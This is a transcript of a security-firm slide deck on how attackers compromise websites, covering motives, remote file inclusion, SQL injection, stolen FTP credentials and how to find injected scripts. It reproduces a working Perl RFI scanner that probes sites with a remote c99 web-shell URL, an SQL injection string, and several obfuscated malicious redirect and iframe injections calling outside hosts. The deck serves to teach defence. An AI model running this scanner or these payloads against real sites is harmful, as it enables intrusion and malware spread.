1 / 31

How Hackers Hack Websites

How Hackers Hack Websites. Presented by Thomas J. Raef WeWatchYourWebsite.com. Understand their motivation. Money $$$ That’s it!. Credit card fraud. Credit card fraud. Pay-per-install. Pay-per-install. Fake anti-virus software. Fake anti-virus software. Fake anti-virus software.

adina
Download Presentation

How Hackers Hack Websites

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. How Hackers Hack Websites Presented by Thomas J. Raef WeWatchYourWebsite.com

  2. Understand their motivation • Money $$$ • That’s it!

  3. Credit card fraud

  4. Credit card fraud

  5. Pay-per-install

  6. Pay-per-install

  7. Fake anti-virus software

  8. Fake anti-virus software

  9. Fake anti-virus software

  10. Now you know why, but how? • Software vulnerabilities • OpenX • Wordpress • Joomla • osCommerce

  11. Specific methods • Remote file inclusion • Adding a URL string to an existing query • /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=(URL to malicious file)

  12. RFI Scanner • Code: • #!/usr/bin/perluse LWP::Simple;use LWP::UserAgent;use HTTP::Request;print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";print "+           RFI Dork Scanner          +\n";print "+           Coded by H4k3r            +\n";print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+";print "\nInsert RFI Dork > ";chomp($dork = <STDIN>);print "\nTotal Query Pages 10 Links/Page > ";chomp($page = <STDIN>);print "\n[+]@#~Result~#@[+]\n\n";for ($start = 0;$start != $page*10;$start += 10)    {    $search = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.0');    $resp = $ua->get($search);    if ($resp -> is_success)        {        $cont = $resp -> content;        @linkz0r = split (/<a href=/, $cont);foreach $line(@linkz0r)            {            if ($line =~ /(.*) class=l/ig)                {                $click = $1;                $ua = LWP::UserAgent->new(agent => 'Mozilla 5.0');                $resp = $ua -> get($click."http://tr-shell.org/c99.txt?");                $shelld0m = $resp->content();                if ($shelld0m =~m/c99shell/)                    {                    print "$click could be vulnerable to RFI\n";                    }                }            }        }    }

  13. SQL Injection • $result=mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"'); • quotes in $_GET['username'] are not escaped • " OR 1 OR username = “ • SELECT * FROM users WHERE username = "" OR 1 OR username = "“ • Selects all rows from the table “users”

  14. SQLi Prevention • if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)) $result = mysql_query("SELECT * FROM users WHERE username=$matches[0]"); else // we don't bother querying the database echo "username not accepted"; • Or, replace echo with exit or die

  15. SQLi Prevention • mysql_real_escape_string() • escapes all potentially dangerous characters in the string provided and returns the escaped string so that it may be safe to put into a MySQL query • …after properly sanitizing the input

  16. SQLi Prevention function sql_quote( $value ) { if( get_magic_quotes_gpc() ) {        $value = stripslashes( $value ); } //check if this function exists if( function_exists( "mysql_real_escape_string" ) ) {        $value = mysql_real_escape_string( $value ); } return $value; }

  17. Stolen FTP credentials • Anti-virus companies face 40,000 variants a day • Free FTP programs typically store their saved credentials in plain text • FileZilla: C:\Documents and Settings\Administrator\Application Data\FileZilla\sitemanager.xml

  18. FTP • Is insecure: http://www.youtube.com/watch?v=oYI1kssrrbc • Switch to SFTP. It’s encrypted traffic

  19. What does it look like? • <div align="center"></table> </div> • <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> • </script> • <script type="text/javascript"> • _uacct = "UA-3907581-1"; • urchinTracker(); • </script> • </body> • </html> • <script>document.location.href='http://funnysignage.com/r.php';</script><script>document.location.href='http://funnysignage.com/r.php';</script>

  20. Malicious scripts preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E… PHP hex

  21. Obfuscated javascript <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%73%70%6F%6F%2E%63%6F%6D%2F%3F%36%31%39%37%39%36%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script> document.write(\'<iframe src="http://saspoo.com/?619796" width=1 height=1></iframe>\')\'));</script> '

  22. Malscripts • <script>/*GNU GPL*/ try{window.onload = function(){var E411a2jh88t = document.createElement('script');E411a2jh88t.setAttribute('type', 'text/javascript');E411a2jh88t.setAttribute('id', 'myscript1');E411a2jh88t.setAttribute('src', 'h(#t)$&(t((p():@&/)!/^&&w#(i))k(i&&p!(e$)d!&i(^a@((-$o#)r^!(@g!&$.&$s$&m^^)a)@#s!h&^@i!@$)(n))!g)m)@a)g&((a(@z&(i&n$$##e().^$(!c@o$#)@m^.!!@f!&o#$)o$(#d!#n$!(e^)t!&$&w^$o)r!#&k)@-#()c(o@m!.$^&e^&)a$s&^y!@$!#t)&a))b!^(l#&@e#t@!@e@(n@$^n!@&i^^s!)!.&&r$&u!:@))(8^$0^8)(@0$&#/@&(1!((9!l@o$&^u#@#.^&c@@$o!m!@^/&#^1)(9))l^(!o#&@u@(.$#(c(#o!&!^m##/@#^g#@o$o((g@^l^)$e^.(#$#c!!$o^m!!#$/(&!^z#a!)p#@p&$^o$@&s#)(.(@&&c$)o(^!m!((/)&@&&a(v!^$a&!$$s!t)^(.#&c#(o&(m@/$'.replace(/&|\)|\(|\$|@|\^|\!|#/ig, ''));E411a2jh88t.setAttribute('defer', 'defer');document.body.appendChild(E411a2jh88t);}} catch(e) {}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> • <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="es"> • <head> • <title>Auto Care Shop</title>

  23. Tricks of the trade • <script src=“jQuery.js”></script> • <script alert(document+”</script>”);</script> • [jQuery.js]: • <script unescape(“%65%67…”); • Any malscript could be placed in jQuery.js

  24. Tricks of the trade <html> <script> function wr1te(z) { s=e.split(“Z”); for(i=0;i<s.length-1;i++){ document.write(String.fromCharCode(s[i])); } } </script> <body onload=“wr1te(‘72Z101Z108Z111Z87Z111Z114Z108Z100Z’);”> … </body> </html>

  25. Tricks of the trade <div id=“content” style=“display:none;”>…stuff…</div> <script> function defun(a) {malicious stuff} varz=document.getElementById(‘content’).innerHTML; eval(defun(z)); </script>

  26. Where to look • Before the opening html tag • Before the closing head tag • Between the closing head tag and the opening body tag • Immediately after the body tag and it’s attributes • Before the closing body tag • Between the closing body tag and closing html tag • After the closing html tag

  27. Where to look • In javascript files: • Usually in a document.write at the very bottom

  28. Where to look • Images folders • Any php file in there is suspect • Admin folders • Any folders

  29. What “not” to look for • Newest datetime stamp • Uncommon file names • Not so much iframes in plain view

  30. Summary • As many as 40,000 websites are infected every week • Hackers make money • RFI, SQLi, FTP • Update all software, including plugins, extensions, etc. • Switch to SFTP

  31. Contact information http://www.wewatchyourwebsite.com Thomas J. Raef (847)833-5666 traef@wewatchyourwebsite.com

More Related